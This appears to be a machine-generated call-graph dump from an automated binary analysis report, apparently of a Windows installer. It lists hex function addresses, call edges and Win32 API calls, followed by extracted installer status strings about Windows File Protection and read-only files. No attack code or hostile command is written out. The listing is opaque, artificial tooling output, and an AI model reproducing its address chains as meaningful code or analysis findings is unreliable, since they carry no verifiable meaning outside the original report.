53405 46b025 53405->53340 53408 403400 4 API calls 53407->53408 53409 46a299 53408->53409 53875 47d9bc 53409->53875 53411 46a2f8 53412 46a315 53411->53412 53413 46a2fc 53411->53413 53414 46a306 53412->53414 53885 494660 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53412->53885 53882 466b6c 53413->53882 53418 46a434 53414->53418 53419 46a49f 53414->53419 53467 46a5a9 53414->53467 53417 46a331 53417->53414 53421 46a339 53417->53421 53422 403494 4 API calls 53418->53422 53423 403494 4 API calls 53419->53423 53420 403420 4 API calls 53424 46a5d3 53420->53424 53425 46b2a0 23 API calls 53421->53425 53426 46a441 53422->53426 53427 46a4ac 53423->53427 53424->53340 53435 46a346 53425->53435 53428 40357c 4 API calls 53426->53428 53429 40357c 4 API calls 53427->53429 53430 46a44e 53428->53430 53431 46a4b9 53429->53431 53432 40357c 4 API calls 53430->53432 53433 40357c 4 API calls 53431->53433 53436 46a45b 53432->53436 53434 46a4c6 53433->53434 53438 40357c 4 API calls 53434->53438 53441 46a387 53435->53441 53442 46a36f SetActiveWindow 53435->53442 53437 40357c 4 API calls 53436->53437 53439 46a468 53437->53439 53440 46a4d3 53438->53440 53443 466b6c 20 API calls 53439->53443 53444 40357c 4 API calls 53440->53444 53886 42f570 53441->53886 53442->53441 53445 46a476 53443->53445 53446 46a4e1 53444->53446 53447 40357c 4 API calls 53445->53447 53448 414b28 4 API calls 53446->53448 53451 46a47f 53447->53451 53458 46a49d 53448->53458 53453 40357c 4 API calls 53451->53453 53456 46a48c 53453->53456 53455 46a3d8 53459 46b11c 21 API calls 53455->53459 53457 414b28 4 API calls 53456->53457 53457->53458 53903 466ea4 53458->53903 53460 46a40a 53459->53460 53460->53340 53461 46a503 53462 414b28 4 API calls 53461->53462 53461->53467 53467->53420 53469 468fe0 19 API calls 53468->53469 53470 46b2b8 53469->53470 53471 46b2da 53470->53471 53472 465638 7 API calls 53470->53472 54022 465638 53471->54022 53472->53471 53476 46b2f2 53477 46b11c 21 API calls 53476->53477 53478 46b32a 53477->53478 53479 414b28 4 API calls 53478->53479 53480 46b33e 53479->53480 53481 46b374 53480->53481 53482 46b34a 53480->53482 53485 46b393 53481->53485 53486 46b3bd 53481->53486 53483 414b28 4 API calls 53482->53483 53484 46b35e 53483->53484 53488 414b28 4 API calls 53484->53488 53489 414b28 4 API calls 53485->53489 53487 414b28 4 API calls 53486->53487 53490 46b3d1 53487->53490 53491 46b372 53488->53491 53492 46b3a7 53489->53492 53493 414b28 4 API calls 53490->53493 54039 46b034 53491->54039 53494 414b28 4 API calls 53492->53494 53493->53491 53494->53491 53498 468fe0 19 API calls 53501 46b46f 53498->53501 53499 46b40f 53499->53498 53500 46b4d2 53500->53346 53501->53500 54044 4946bc 18 API calls 53501->54044 53505 46a637 53503->53505 53504 46a66e 53507 46a7e3 53504->53507 53520 46a682 53504->53520 53505->53504 54064 47dc30 53505->54064 53510 46a817 53507->53510 53516 46a801 53507->53516 53544 46a95a 53507->53544 53508 403400 4 API calls 53512 46a97f 53508->53512 53509 46a7c0 53513 46a7db 53509->53513 53518 402660 4 API calls 53509->53518 53511 414b28 4 API calls 53510->53511 53517 46a815 53511->53517 53512->53350 53513->53350 53514 402660 4 API calls 53514->53520 53515 402648 4 API calls 53515->53520 53521 414b28 4 API calls 53516->53521 54076 495520 MulDiv 53517->54076 53518->53513 53519 46a78c 53523 457d58 24 API calls 53519->53523 53520->53514 53520->53515 53529 46a6f5 53520->53529 53521->53517 53523->53509 53524 46a838 53527 466ea4 11 API calls 53524->53527 53526 457d58 24 API calls 53526->53529 53528 46a86c 53527->53528 53529->53509 53529->53519 53529->53526 53531 40357c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53529->53531 54075 403ba4 7 API calls 53529->54075 53531->53529 53544->53508 53546 46c6cc 48 API calls 53545->53546 53547 482b4f 53546->53547 53548 482b58 53547->53548 54292 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53547->54292 53550 414af8 4 API calls 53548->53550 53551 482b68 53550->53551 53552 403450 4 API calls 53551->53552 53553 482b75 53552->53553 54102 46ca24 53553->54102 53556 482b85 53557 414af8 4 API calls 53556->53557 53559 482b95 53557->53559 53560 403450 4 API calls 53559->53560 53561 482ba2 53560->53561 53562 469bd4 SendMessageA 53561->53562 53563 482bbb 53562->53563 53564 482c0c 53563->53564 54294 479c64 23 API calls 53563->54294 53566 4241ec 11 API calls 53564->53566 53567 482c16 53566->53567 53568 482c3c 53567->53568 53569 482c27 SetActiveWindow 53567->53569 54131 481f3c 53568->54131 53569->53568 53618->53322 53619->53307 53620->53307 53621->53307 53622->53332 53624 468f1c 19 API calls 53623->53624 53631->53340 53647 46c764 53632->53647 53635 414af8 53636 414b06 53635->53636 53637 4034e0 4 API calls 53636->53637 53638 414b13 53637->53638 53638->53361 53639->53372 53642 466986 53640->53642 53641 4078fc 19 API calls 53643 4669c1 53641->53643 53642->53641 53643->53379 53644->53371 53645->53370 53646->53363 53648 414af8 4 API calls 53647->53648 53649 46c798 53648->53649 53708 466c04 53649->53708 53653 46c7aa 53654 46c7b9 53653->53654 53656 46c7d2 53653->53656 53742 47eadc 42 API calls 53654->53742 53659 46c819 53656->53659 53661 46c800 53656->53661 53657 403420 4 API calls 53658 46ba3a 53657->53658 53658->53357 53658->53635 53660 46c87e 53659->53660 53674 46c81d 53659->53674 53745 42cb5c CharNextA 53660->53745 53743 47eadc 42 API calls 53661->53743 53664 46c88d 53665 46c891 53664->53665 53668 46c8aa 53664->53668 53746 47eadc 42 API calls 53665->53746 53667 46c865 53744 47eadc 42 API calls 53667->53744 53669 46c8ce 53668->53669 53722 466d74 53668->53722 53747 47eadc 42 API calls 53669->53747 53674->53667 53674->53668 53677 46c8e7 53678 403778 4 API calls 53677->53678 53679 46c8fd 53678->53679 53730 42c9ac 53679->53730 53682 46c90e 53748 466e00 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53682->53748 53683 46c93f 53684 42c8dc 5 API calls 53683->53684 53686 46c94a 53684->53686 53688 42c40c 5 API calls 53686->53688 53687 46c921 53689 451444 4 API calls 53687->53689 53690 46c955 53688->53690 53691 46c92e 53689->53691 53692 42cbd0 6 API calls 53690->53692 53749 47eadc 42 API calls 53691->53749 53694 46c960 53692->53694 53734 46c6f8 53694->53734 53696 46c968 53697 42cd58 7 API calls 53696->53697 53698 46c970 53697->53698 53699 46c974 53698->53699 53700 46c98a 53698->53700 53750 47eadc 42 API calls 53699->53750 53702 46c7cd 53700->53702 53703 46c994 53700->53703 53702->53657 53704 46c99c GetDriveTypeA 53703->53704 53704->53702 53713 466c1e 53708->53713 53710 42cbd0 6 API calls 53710->53713 53711 403450 4 API calls 53711->53713 53712 406bb8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53712->53713 53713->53710 53713->53711 53713->53712 53714 466c67 53713->53714 53752 42cabc 53713->53752 53715 403420 4 API calls 53714->53715 53716 466c81 53715->53716 53717 414b28 53716->53717 53718 414af8 4 API calls 53717->53718 53719 414b4c 53718->53719 53720 403400 4 API calls 53719->53720 53721 414b7d 53720->53721 53721->53653 53723 466d7e 53722->53723 53724 466d91 53723->53724 53763 42cb4c CharNextA 53723->53763 53724->53669 53726 466da4 53724->53726 53727 466dae 53726->53727 53728 466ddb 53727->53728 53764 42cb4c CharNextA 53727->53764 53728->53669 53728->53677 53731 42ca05 53730->53731 53732 42c9c2 53730->53732 53731->53682 53731->53683 53732->53731 53765 42cb4c CharNextA 53732->53765 53735 46c75d 53734->53735 53736 46c70b 53734->53736 53735->53696 53736->53735 53737 41eeb4 2 API calls 53736->53737 53738 46c71b 53737->53738 53739 46c735 SHPathPrepareForWriteA 53738->53739 53740 41ef68 6 API calls 53739->53740 53741 46c755 53740->53741 53741->53696 53742->53702 53743->53702 53744->53702 53745->53664 53746->53702 53747->53702 53748->53687 53749->53702 53750->53702 53753 403494 4 API calls 53752->53753 53754 42cacc 53753->53754 53755 403744 4 API calls 53754->53755 53758 42cb02 53754->53758 53761 42c454 IsDBCSLeadByte 53754->53761 53755->53754 53757 42cb46 53757->53713 53758->53757 53760 4037b8 4 API calls 53758->53760 53762 42c454 IsDBCSLeadByte 53758->53762 53760->53758 53761->53754 53762->53758 53763->53723 53764->53727 53765->53732 53766->53397 53769 46aabf 53767->53769 53768 46af37 53770 46af52 53768->53770 53771 46af83 53768->53771 53769->53768 53772 46ab7a 53769->53772 53776 403494 4 API calls 53769->53776 53775 403494 4 API calls 53770->53775 53773 403494 4 API calls 53771->53773 53774 46ab9b 53772->53774 53778 46abdc 53772->53778 53777 46af91 53773->53777 53779 403494 4 API calls 53774->53779 53780 46af60 53775->53780 53781 46aafe 53776->53781 53871 4694c8 12 API calls 53777->53871 53784 403400 4 API calls 53778->53784 53786 46aba9 53779->53786 53870 4694c8 12 API calls 53780->53870 53783 414af8 4 API calls 53781->53783 53788 46ab1f 53783->53788 53789 46abda 53784->53789 53787 414af8 4 API calls 53786->53787 53791 46abca 53787->53791 53792 403634 4 API calls 53788->53792 53811 46acc0 53789->53811 53853 469bd4 53789->53853 53790 46af6e 53793 403400 4 API calls 53790->53793 53794 403634 4 API calls 53791->53794 53795 46ab2f 53792->53795 53797 46afb4 53793->53797 53794->53789 53799 414af8 4 API calls 53795->53799 53802 403400 4 API calls 53797->53802 53798 46ad48 53800 403400 4 API calls 53798->53800 53803 46ab43 53799->53803 53804 46ad46 53800->53804 53801 46abfc 53805 46ac02 53801->53805 53806 46ac3a 53801->53806 53807 46afbc 53802->53807 53803->53772 53813 414af8 4 API calls 53803->53813 53865 46a010 43 API calls 53804->53865 53809 403494 4 API calls 53805->53809 53808 403400 4 API calls 53806->53808 53810 403420 4 API calls 53807->53810 53812 46ac38 53808->53812 53814 46ac10 53809->53814 53815 46afc9 53810->53815 53811->53798 53816 46ad07 53811->53816 53859 469ec8 53812->53859 53818 46ab6a 53813->53818 53820 47bfd8 43 API calls 53814->53820 53815->53403 53817 403494 4 API calls 53816->53817 53821 46ad15 53817->53821 53822 403634 4 API calls 53818->53822 53824 46ac28 53820->53824 53825 414af8 4 API calls 53821->53825 53822->53772 53823 46ad71 53830 46add2 53823->53830 53831 46ad7c 53823->53831 53827 403634 4 API calls 53824->53827 53828 46ad36 53825->53828 53827->53812 53832 403634 4 API calls 53828->53832 53829 46ac61 53835 46acc2 53829->53835 53836 46ac6c 53829->53836 53834 403400 4 API calls 53830->53834 53833 403494 4 API calls 53831->53833 53832->53804 53842 46ad8a 53833->53842 53837 46adda 53834->53837 53838 403400 4 API calls 53835->53838 53839 403494 4 API calls 53836->53839 53840 46add0 53837->53840 53851 46ae83 53837->53851 53838->53811 53844 46ac7a 53839->53844 53840->53837 53866 494660 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53840->53866 53842->53837 53842->53840 53846 403634 4 API calls 53842->53846 53843 46adfd 53843->53851 53867 49490c 18 API calls 53843->53867 53844->53811 53847 403634 4 API calls 53844->53847 53846->53842 53847->53844 53849 46af24 53869 429154 SendMessageA SendMessageA 53849->53869 53868 429104 SendMessageA 53851->53868 53852->53405 53872 42a050 SendMessageA 53853->53872 53855 469be3 53856 469c03 53855->53856 53873 42a050 SendMessageA 53855->53873 53856->53801 53858 469bf3 53858->53801 53863 469ef5 53859->53863 53860 469f57 53861 403400 4 API calls 53860->53861 53862 469f6c 53861->53862 53862->53829 53863->53860 53874 469e4c 43 API calls 53863->53874 53865->53823 53866->53843 53867->53851 53868->53849 53869->53768 53870->53790 53871->53790 53872->53855 53873->53858 53874->53863 53876 47d9cf 53875->53876 53879 47da0c 53875->53879 53907 455cf8 53876->53907 53879->53411 53881 47da1f 53881->53411 53962 466a80 53882->53962 53885->53417 53887 42f57c 53886->53887 53888 42f59f GetActiveWindow GetFocus 53887->53888 53889 41eeb4 2 API calls 53888->53889 53890 42f5b6 53889->53890 53891 42f5d3 53890->53891 53892 42f5c3 RegisterClassA 53890->53892 53893 42f662 SetFocus 53891->53893 53894 42f5e1 CreateWindowExA 53891->53894 53892->53891 53895 403400 4 API calls 53893->53895 53894->53893 53896 42f614 53894->53896 53897 42f67e 53895->53897 53983 42428c 53896->53983 53902 49490c 18 API calls 53897->53902 53899 42f63c 53900 42f644 CreateWindowExA 53899->53900 53900->53893 53901 42f65a ShowWindow 53900->53901 53901->53893 53902->53455 53989 44b524 53903->53989 53905 466eab 53905->53461 53908 455d09 53907->53908 53909 455d16 53908->53909 53910 455d0d 53908->53910 53941 455adc 29 API calls 53909->53941 53933 4559fc 53910->53933 53913 455d13 53913->53879 53914 47d628 53913->53914 53920 47d726 53914->53920 53923 47d665 53914->53923 53915 47d6c9 53916 403420 4 API calls 53915->53916 53917 47d80e 53916->53917 53917->53881 53918 47954c 19 API calls 53918->53920 53920->53915 53920->53918 53924 47d77c 53920->53924 53921 4797f0 4 API calls 53921->53923 53922 47bfd8 43 API calls 53922->53924 53923->53915 53923->53920 53923->53921 53927 47bfd8 43 API calls 53923->53927 53931 47d6d2 53923->53931 53950 47968c 53923->53950 53924->53920 53924->53922 53926 4540ec 20 API calls 53924->53926 53928 47d713 53924->53928 53925 47bfd8 43 API calls 53925->53931 53926->53924 53927->53923 53928->53915 53929 42c93c 5 API calls 53929->53931 53930 42c964 5 API calls 53930->53931 53931->53923 53931->53925 53931->53928 53931->53929 53931->53930 53961 47d334 52 API calls 53931->53961 53934 42de2c RegOpenKeyExA 53933->53934 53935 455a19 53934->53935 53936 455a67 53935->53936 53942 455930 53935->53942 53936->53913 53939 455930 6 API calls 53940 455a48 RegCloseKey 53939->53940 53940->53913 53941->53913 53947 42dd68 53942->53947 53944 403420 4 API calls 53945 4559e2 53944->53945 53945->53939 53946 455958 53946->53944 53948 42dc10 6 API calls 53947->53948 53949 42dd71 53948->53949 53949->53946 53951 4796a2 53950->53951 53952 47969e 53950->53952 53953 403450 4 API calls 53951->53953 53952->53923 53954 4796af 53953->53954 53955 4796b5 53954->53955 53956 4796cf 53954->53956 53957 47954c 19 API calls 53955->53957 53958 47954c 19 API calls 53956->53958 53959 4796cb 53957->53959 53958->53959 53960 403400 4 API calls 53959->53960 53960->53952 53961->53931 53963 403494 4 API calls 53962->53963 53964 466aae 53963->53964 53965 42dbd8 5 API calls 53964->53965 53966 466ac0 53965->53966 53967 42dbd8 5 API calls 53966->53967 53968 466ad2 53967->53968 53969 46696c 19 API calls 53968->53969 53970 466adc 53969->53970 53971 42dbd8 5 API calls 53970->53971 53972 466aeb 53971->53972 53979 4669e4 53972->53979 53975 42dbd8 5 API calls 53976 466b04 53975->53976 53977 403400 4 API calls 53976->53977 53978 466b19 53977->53978 53978->53414 53980 466a04 53979->53980 53981 4078fc 19 API calls 53980->53981 53982 466a4e 53981->53982 53982->53975 53984 4242be 53983->53984 53985 42429e GetWindowTextA 53983->53985 53987 403494 4 API calls 53984->53987 53986 4034e0 4 API calls 53985->53986 53988 4242bc 53986->53988 53987->53988 53988->53899 53992 44b39c 53989->53992 53991 44b537 53991->53905 53993 44b3cf 53992->53993 53994 414af8 4 API calls 53993->53994 53995 44b3e2 53994->53995 53996 44b40f 73E9A570 53995->53996 53997 40357c 4 API calls 53995->53997 54003 41a1f8 53996->54003 53997->53996 54000 44b440 54011 44b0d0 54000->54011 54002 44b454 73E9A480 54002->53991 54004 41a223 54003->54004 54005 41a2bf 54003->54005 54008 403520 4 API calls 54004->54008 54006 403400 4 API calls 54005->54006 54007 41a2d7 SelectObject 54006->54007 54007->54000 54009 41a27b 54008->54009 54010 41a2b3 CreateFontIndirectA 54009->54010 54010->54005 54012 44b0e7 54011->54012 54013 44b17a 54012->54013 54014 44b163 54012->54014 54015 44b0fa 54012->54015 54013->54002 54016 44b173 DrawTextA 54014->54016 54015->54013 54017 402648 4 API calls 54015->54017 54016->54013 54018 44b10b 54017->54018 54019 44b129 MultiByteToWideChar DrawTextW 54018->54019 54020 402660 4 API calls 54019->54020 54021 44b15b 54020->54021 54021->54002 54024 465643 54022->54024 54023 46571e 54033 4673f8 54023->54033 54024->54023 54028 465693 54024->54028 54045 421a2c 54024->54045 54025 4656d6 54025->54023 54051 4185c8 7 API calls 54025->54051 54028->54025 54029 4656cd 54028->54029 54030 4656d8 54028->54030 54031 421a2c 7 API calls 54029->54031 54032 421a2c 7 API calls 54030->54032 54031->54025 54032->54025 54034 467428 54033->54034 54035 467409 54033->54035 54034->53476 54036 414b28 4 API calls 54035->54036 54037 467417 54036->54037 54038 414b28 4 API calls 54037->54038 54038->54034 54040 46b041 54039->54040 54041 421a2c 7 API calls 54040->54041 54042 46b0cc 54041->54042 54042->53499 54043 466ecc 18 API calls 54042->54043 54043->53499 54044->53500 54047 421a84 54045->54047 54050 421a3a 54045->54050 54047->54028 54049 421a69 54049->54047 54060 421d38 SetFocus GetFocus 54049->54060 54050->54049 54052 408cc4 54050->54052 54051->54023 54053 408cd0 54052->54053 54061 406df4 LoadStringA 54053->54061 54056 403450 4 API calls 54057 408d01 54056->54057 54058 403400 4 API calls 54057->54058 54059 408d16 54058->54059 54059->54049 54060->54047 54062 4034e0 4 API calls 54061->54062 54063 406e21 54062->54063 54063->54056 54065 402648 4 API calls 54064->54065 54066 47dc4c 54065->54066 54067 47d628 61 API calls 54066->54067 54068 47dc6b 54067->54068 54069 47dc7f 54068->54069 54080 47da48 54068->54080 54071 47dcab 54069->54071 54073 402660 4 API calls 54069->54073 54072 402660 4 API calls 54071->54072 54074 47dcb5 54072->54074 54073->54069 54074->53504 54075->53529 54076->53524 54081 403494 4 API calls 54080->54081 54096 47da75 54081->54096 54094 42c93c 5 API calls 54094->54096 54096->54094 54099 47dac8 54096->54099 54100 42e8b0 CharNextA 54096->54100 54100->54096 54103 46ca4d 54102->54103 54104 46ca9a 54103->54104 54105 414af8 4 API calls 54103->54105 54107 403420 4 API calls 54104->54107 54106 46ca63 54105->54106 54301 466c90 6 API calls 54106->54301 54109 46cb44 54107->54109 54109->53556 54293 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54109->54293 54110 46ca6b 54111 414b28 4 API calls 54110->54111 54112 46ca79 54111->54112 54113 46ca86 54112->54113 54116 46ca9f 54112->54116 54302 47eadc 42 API calls 54113->54302 54115 46cab7 54303 47eadc 42 API calls 54115->54303 54116->54115 54117 466d74 CharNextA 54116->54117 54119 46cab3 54117->54119 54119->54115 54120 46cacd 54119->54120 54121 46cad3 54120->54121 54122 46cae9 54120->54122 54304 47eadc 42 API calls 54121->54304 54124 42c9ac CharNextA 54122->54124 54125 46caf6 54124->54125 54125->54104 54305 466e00 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54125->54305 54127 46cb0d 54128 451444 4 API calls 54127->54128 54129 46cb1a 54128->54129 54306 47eadc 42 API calls 54129->54306 54132 481f8d 54131->54132 54133 481f5f 54131->54133 54135 475dbc 54132->54135 54307 4946bc 18 API calls 54133->54307 54136 457b4c 24 API calls 54135->54136 54137 475e08 54136->54137 54138 4072b0 SetCurrentDirectoryA 54137->54138 54139 475e12 54138->54139 54308 46e5b0 54139->54308 54143 475e22 54294->53564 54301->54110 54302->54104 54303->54104 54304->54104 54305->54127 54306->54104 54307->54132 54309 46e623 54308->54309 54311 46e5cd 54308->54311 54312 46e628 54309->54312 54310 47968c 19 API calls 54310->54311 54311->54309 54311->54310 54313 46e64e 54312->54313 54756 44fb08 54313->54756 54315 46e6aa 54315->54143 54759 44fb1c 54756->54759 54760 44fb2d 54759->54760 54761 44fb19 54760->54761 54762 44fb57 MulDiv 54760->54762 54761->54315 54763 4181f0 54762->54763 54764 44fb82 SendMessageA 54763->54764 54764->54761 56176 498578 56234 403344 56176->56234 56178 498586 56237 4056a0 56178->56237 56180 49858b 56240 406334 GetModuleHandleA GetProcAddress 56180->56240 56186 49859a 56257 410964 56186->56257 56188 49859f 56261 412938 56188->56261 56190 4985a9 56266 419050 GetVersion 56190->56266 56507 4032fc 56234->56507 56236 403349 GetModuleHandleA GetCommandLineA 56236->56178 56239 4056db 56237->56239 56508 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56237->56508 56239->56180 56241 406350 56240->56241 56242 406357 GetProcAddress 56240->56242 56241->56242 56243 406366 56242->56243 56244 40636d GetProcAddress 56242->56244 56243->56244 56245 406380 56244->56245 56246 40637c SetProcessDEPPolicy 56244->56246 56247 409954 56245->56247 56246->56245 56509 40902c 56247->56509 56252 408728 7 API calls 56253 409977 56252->56253 56524 409078 GetVersionExA 56253->56524 56256 409b88 6F9C1CD0 56256->56186 56258 41096e 56257->56258 56259 4109ad GetCurrentThreadId 56258->56259 56260 4109c8 56259->56260 56260->56188 56526 40af0c 56261->56526 56265 412964 56265->56190 56538 41de34 8 API calls 56266->56538 56268 419069 56540 418f48 GetCurrentProcessId 56268->56540 56507->56236 56508->56239 56510 408cc4 5 API calls 56509->56510 56511 40903d 56510->56511 56512 4085e4 GetSystemDefaultLCID 56511->56512 56516 40861a 56512->56516 56513 408570 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 56513->56516 56514 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56514->56516 56515 406df4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56515->56516 56516->56513 56516->56514 56516->56515 56520 40867c 56516->56520 56517 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56517->56520 56518 406df4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56518->56520 56519 408570 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 56519->56520 56520->56517 56520->56518 56520->56519 56521 4086ff 56520->56521 56522 403420 4 API calls 56521->56522 56523 408719 56522->56523 56523->56252 56525 40908f 56524->56525 56525->56256 56527 40af13 56526->56527 56528 40af32 56527->56528 56537 40ae44 19 API calls 56527->56537 56530 41101c 56528->56530 56531 41103e 56530->56531 56532 406df4 5 API calls 56531->56532 56533 403450 4 API calls 56531->56533 56534 41105d 56531->56534 56532->56531 56533->56531 56535 403400 4 API calls 56534->56535 56536 411072 56535->56536 56536->56265 56537->56527 56539 41deae 56538->56539 56539->56268 56556 4078c8 56540->56556 57815 42f530 57816 42f53b 57815->57816 57817 42f53f NtdllDefWindowProc_A 57815->57817 57817->57816 55808 416b52 55809 416bfa 55808->55809 55810 416b6a 55808->55810 55827 41532c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55809->55827 55812 416b84 SendMessageA 55810->55812 55813 416b78 55810->55813 55823 416bd8 55812->55823 55814 416b82 CallWindowProcA 55813->55814 55815 416b9e 55813->55815 55814->55823 55824 41a068 GetSysColor 55815->55824 55818 416ba9 SetTextColor 55819 416bbe 55818->55819 55825 41a068 GetSysColor 55819->55825 55821 416bc3 SetBkColor 55826 41a6f0 GetSysColor CreateBrushIndirect 55821->55826 55824->55818 55825->55821 55826->55823 55827->55823 57818 4358f0 57819 435905 57818->57819 57823 43591f 57819->57823 57824 4352d8 57819->57824 57828 435322 57824->57828 57829 435308 57824->57829 57825 403400 4 API calls 57826 435727 57825->57826 57826->57823 57837 435738 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57826->57837 57827 446db4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57827->57829 57828->57825 57829->57827 57829->57828 57830 402648 4 API calls 57829->57830 57831 4038a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57829->57831 57833 431cb0 4 API calls 57829->57833 57834 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57829->57834 57835 403744 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57829->57835 57838 4343c0 57829->57838 57850 434b84 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57829->57850 57830->57829 57831->57829 57833->57829 57834->57829 57835->57829 57837->57823 57839 43447d 57838->57839 57840 4343ed 57838->57840 57869 434320 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57839->57869 57841 403494 4 API calls 57840->57841 57843 4343fb 57841->57843 57844 403778 4 API calls 57843->57844 57848 43441c 57844->57848 57845 403400 4 API calls 57846 4344cd 57845->57846 57846->57829 57847 43446f 57847->57845 57848->57847 57851 494314 57848->57851 57850->57829 57852 49434c 57851->57852 57853 4943e4 57851->57853 57854 403494 4 API calls 57852->57854 57870 448940 57853->57870 57859 494357 57854->57859 57856 494367 57857 403400 4 API calls 57856->57857 57858 494408 57857->57858 57860 403400 4 API calls 57858->57860 57859->57856 57861 4037b8 4 API calls 57859->57861 57862 494410 57860->57862 57863 494380 57861->57863 57862->57848 57863->57856 57864 4037b8 4 API calls 57863->57864 57865 4943a3 57864->57865 57866 403778 4 API calls 57865->57866 57867 4943d4 57866->57867 57868 403634 4 API calls 57867->57868 57868->57853 57869->57847 57871 448965 57870->57871 57881 4489a8 57870->57881 57872 403494 4 API calls 57871->57872 57874 448970 57872->57874 57877 4037b8 4 API calls 57874->57877 57875 4489bc 57876 403400 4 API calls 57875->57876 57878 4489ef 57876->57878 57879 44898c 57877->57879 57878->57856 57880 4037b8 4 API calls 57879->57880 57880->57881 57881->57875 57882 44853c 57881->57882 57883 403494 4 API calls 57882->57883 57884 448572 57883->57884 57885 4037b8 4 API calls 57884->57885 57886 448584 57885->57886 57887 403778 4 API calls 57886->57887 57888 4485a5 57887->57888 57889 4037b8 4 API calls 57888->57889 57890 4485bd 57889->57890 57891 403778 4 API calls 57890->57891 57892 4485e8 57891->57892 57893 4037b8 4 API calls 57892->57893 57895 448600 57893->57895 57894 4486d3 57899 4486db GetProcAddress 57894->57899 57895->57894 57897 44865b LoadLibraryExA 57895->57897 57898 44866d LoadLibraryA 57895->57898 57902 448638 57895->57902 57903 403b80 4 API calls 57895->57903 57904 403450 4 API calls 57895->57904 57906 43da98 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57895->57906 57896 403420 4 API calls 57900 448718 57896->57900 57897->57895 57898->57895 57901 4486ee 57899->57901 57900->57875 57901->57902 57902->57896 57903->57895 57904->57895 57906->57895 57907 40ce34 57910 406f18 WriteFile 57907->57910 57911 406f35 57910->57911 55828 416654 55829 416661 55828->55829 55830 4166bb 55828->55830 55836 416560 CreateWindowExA 55829->55836 55837 4162da 55829->55837 55831 416668 SetPropA SetPropA 55831->55830 55832 41669b 55831->55832 55833 4166ae SetWindowPos 55832->55833 55833->55830 55836->55831 55838 416306 55837->55838 55839 4162e6 GetClassInfoA 55837->55839 55838->55831 55839->55838 55840 4162fa GetClassInfoA 55839->55840 55840->55838 57912 4222f4 57913 422303 57912->57913 57918 421284 57913->57918 57916 422323 57919 4212f3 57918->57919 57933 421293 57918->57933 57922 421304 57919->57922 57943 4124e0 GetMenuItemCount GetMenuStringA GetMenuState 57919->57943 57921 421332 57925 4213a5 57921->57925 57930 42134d 57921->57930 57922->57921 57924 4213ca 57922->57924 57923 4213a3 57926 4213f6 57923->57926 57945 421e3c 11 API calls 57923->57945 57924->57923 57928 4213de SetMenu 57924->57928 57925->57923 57932 4213b9 57925->57932 57946 4211cc 10 API calls 57926->57946 57928->57923 57930->57923 57936 421370 GetMenu 57930->57936 57931 4213fd 57931->57916 57941 4221f8 10 API calls 57931->57941 57935 4213c2 SetMenu 57932->57935 57933->57919 57942 408d34 19 API calls 57933->57942 57935->57923 57937 421393 57936->57937 57938 42137a 57936->57938 57944 4124e0 GetMenuItemCount GetMenuStringA GetMenuState 57937->57944 57940 42138d SetMenu 57938->57940 57940->57937 57941->57916 57942->57933 57943->57922 57944->57923 57945->57926 57946->57931 57947 44b4b8 57948 44b4c6 57947->57948 57950 44b4e5 57947->57950 57949 44b39c 11 API calls 57948->57949 57948->57950 57949->57950 57951 448738 57952 448766 57951->57952 57953 44876d 57951->57953 57955 403400 4 API calls 57952->57955 57954 448781 57953->57954 57956 44853c 7 API calls 57953->57956 57954->57952 57957 403494 4 API calls 57954->57957 57959 448917 57955->57959 57956->57954 57958 44879a 57957->57958 57960 4037b8 4 API calls 57958->57960 57961 4487b6 57960->57961 57962 4037b8 4 API calls 57961->57962 57963 4487d2 57962->57963 57963->57952 57964 4487e6 57963->57964 57965 4037b8 4 API calls 57964->57965 57966 448800 57965->57966 57967 431be0 4 API calls 57966->57967 57968 448822 57967->57968 57969 431cb0 4 API calls 57968->57969 57974 448842 57968->57974 57969->57968 57970 448898 57983 442344 57970->57983 57972 448880 57972->57970 57995 4435e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57972->57995 57974->57972 57994 4435e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57974->57994 57976 4488cc GetLastError 57996 4484d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57976->57996 57978 4488db 57997 443620 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57978->57997 57980 4488f0 57998 443630 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57980->57998 57982 4488f8 57984 443322 57983->57984 57985 44237d 57983->57985 57987 403400 4 API calls 57984->57987 57986 403400 4 API calls 57985->57986 57988 442385 57986->57988 57989 443337 57987->57989 57990 431be0 4 API calls 57988->57990 57989->57976 57991 442391 57990->57991 57992 443312 57991->57992 57999 441a1c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57991->57999 57992->57976 57994->57974 57995->57970 57996->57978 57997->57980 57998->57982 57999->57991 58000 4165fc 73EA5CF0 58001 42e3ff SetErrorMode
                                                            Strings
                                                            • Dest file exists., xrefs: 00470C63
                                                            • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 0047113E
                                                            • Dest file is protected by Windows File Protection., xrefs: 00470B95
                                                            • Time stamp of our file: (failed to read), xrefs: 00470C4F
                                                            • .tmp, xrefs: 0047125F
                                                            • Existing file is protected by Windows File Protection. Skipping., xrefs: 00471094
